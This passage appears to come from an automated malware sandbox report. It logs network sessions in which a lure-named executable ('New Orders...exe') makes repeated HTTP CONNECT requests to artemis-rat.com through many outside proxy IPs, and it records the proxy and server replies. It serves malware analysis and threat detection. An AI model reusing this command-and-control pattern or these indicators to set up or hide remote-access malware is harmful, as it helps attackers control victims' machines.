                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        79192.168.2.950041137.184.200.4280007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.833689928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        80192.168.2.949972161.97.163.52551097672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.841593027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.554291964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.585577011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.664603949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.773643970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        81192.168.2.949999147.75.34.86100037672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.851624012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.154690027 CET65INHTTP/1.1 200 Connection Established
                                                                                        Proxy-Agent: Zscaler/6.3


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        82192.168.2.95001995.164.89.12388887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.872025967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.173767090 CET327INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        83192.168.2.950125104.20.123.164807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.880060911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.034317017 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        84192.168.2.950070192.252.208.70142827672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.884778023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        85192.168.2.950029121.159.146.251807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.892961025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        86192.168.2.950138104.21.194.182807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.892961025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.047681093 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        87192.168.2.950140172.67.182.0807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.895335913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.052144051 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        88192.168.2.950066174.64.199.7941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.939969063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        89192.168.2.95012267.43.228.251242797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.940598965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        90192.168.2.95005714.103.24.2080007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.940752983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        91192.168.2.950154104.16.143.127807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.942358017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.096801996 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        92192.168.2.950001120.37.121.20990917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.942437887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.294689894 CET325INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.1
                                                                                        Date: Mon, 11 Mar 2024 15:16:30 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        93192.168.2.950124162.241.46.6500627672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.942780972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        94192.168.2.95007598.64.169.1780807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.948584080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.616817951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.541766882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.438806057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.222575903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.945183039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.742093086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:02.221848965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.316366911 CET39INHTTP/1.1 200 Connection established
                                                                                        Mar 11, 2024 16:17:28.337793112 CET39INHTTP/1.1 200 Connection established
                                                                                        Mar 11, 2024 16:17:31.599180937 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        95192.168.2.950052222.255.238.159807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.950453043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.281793118 CET481INHTTP/1.1 302 Found
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Location: https://ktxcomay.com.vn
                                                                                        Content-Length: 289
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 74 78 63 6f 6d 61 79 2e 63 6f 6d 2e 76 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://ktxcomay.com.vn">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        96192.168.2.95012972.10.164.17814317672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.955121040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:01.996375084 CET28INHTTP/1.1 502 Bad Gateway


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        97192.168.2.950031179.43.8.1680887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.957331896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.710567951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.986581087 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        98192.168.2.950069202.179.184.4454307672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.976917982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        99192.168.2.950133190.153.121.241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.977473021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        100192.168.2.950200104.20.24.214807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.981951952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.136740923 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        101192.168.2.950213172.67.38.96807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
